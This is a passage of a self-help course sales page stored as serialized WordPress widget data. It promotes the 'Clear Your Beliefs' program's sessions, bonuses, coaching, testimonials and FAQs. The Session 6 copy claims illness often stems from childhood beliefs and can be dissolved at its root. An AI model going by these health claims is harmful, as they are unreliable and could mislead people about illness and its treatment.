dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"53";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s: